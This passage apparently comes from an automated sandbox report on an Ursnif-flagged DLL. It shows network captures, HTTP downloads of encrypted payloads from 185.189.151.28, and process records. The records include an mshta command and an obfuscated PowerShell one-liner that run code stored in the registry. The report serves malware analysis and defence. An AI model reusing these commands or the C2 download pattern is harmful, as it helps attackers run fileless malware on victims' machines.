                      May 4, 2022 12:42:53.122225046 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122272015 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122301102 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122339964 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122375011 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122405052 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122411966 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122534037 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122548103 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122561932 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122601032 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122623920 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122648001 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122684956 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122731924 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122745037 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122797966 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122834921 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122858047 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.122858047 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.122885942 CEST8049820185.189.151.28192.168.2.3

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      May 4, 2022 12:42:32.684524059 CEST8.8.8.8192.168.2.30x4db9No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • 185.189.151.28

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349820185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      May 4, 2022 12:42:52.800200939 CEST11884OUTGET /drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2Fp_2B0K/lT2QuoqZm8BQycZwQ/H4nFd1cHmG_2/B8ivI_2F0O9/bJq8uYFSa5v9Ij/oSxEbcCz5_2FkNItSz7M7/RsUqbQcn0xtbFLfk/s_2BoKVrnDqJChc/UQqpJa6I6sYnVdkvyr/aVGGIz6zI/ZEQtOcGy53_2B5iYxze_/2BYqRtgImRp7tBA6q9P/SewC3o45SwnJ_2BNfdtGRr/1q9JxgDBH/3.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 12:42:53.086601019 CEST11886INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 10:42:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186001
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="627258ad129b7.bin"
                      Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                      Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                      May 4, 2022 12:42:53.250349045 CEST12084OUTGET /drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmB/EVC7r5ALKWg/9SLUGnIzpxcWYM/xuMBfgGVcmtRuQEdnu_2F/z6aCj8Veiw_2FLpI/klXzvSCm2R4EgNj/tX1BLPzJEB4fd6nZGQ/ASaXUuL8G/Cb1hq1kHRkSzUSxa9avd/CLUWUoeV5nKWyDrb3Sa/Aw0B4o70zU_2B7Hjx9TwWi/5WU7_2FRUtVgO/Qd4d0Z1_2Bvo/b7ociWkm.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 12:42:53.537480116 CEST12086INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 10:42:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238738
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="627258ad811af.bin"
                      Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                      Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                      May 4, 2022 12:42:53.707282066 CEST12341OUTGET /drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfmJtH6P_2FDxg/fYP24ZJpA_2BXAD0LiynfR/sY7KfedmKK4eh/fSjWb6Xu/fAf6iEN7Rblzydam2OSbiSx/Vw6Cb_2Bbg/Vc9aYir_2By_2BYAt/7uRRpr7mVOmx/v_2F66pvHXt/nmtBefhmAX5DJk/ied6XVEApSsG8HlMS4KeZ/kP7pKEMCKNfzyZum/QUL8CnndyLC0Xcl/NmgSkYn.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 12:42:53.997746944 CEST12343INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 10:42:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1856
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="627258adefd63.bin"
                      Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                      Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:42:11
                      Start date:04/05/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll"
                      Imagebase:0xce0000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:1
                      Start time:12:42:11
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:3
                      Start time:12:42:12
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Imagebase:0x120000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:13
                      Start time:12:42:57
                      Start date:04/05/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff63f290000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:14
                      Start time:12:42:59
                      Start date:04/05/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff746f80000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:15
                      Start time:12:43:00
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:19
                      Start time:12:43:06
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Imagebase:0x7ff61fe60000
                      File size:2739304 bytes
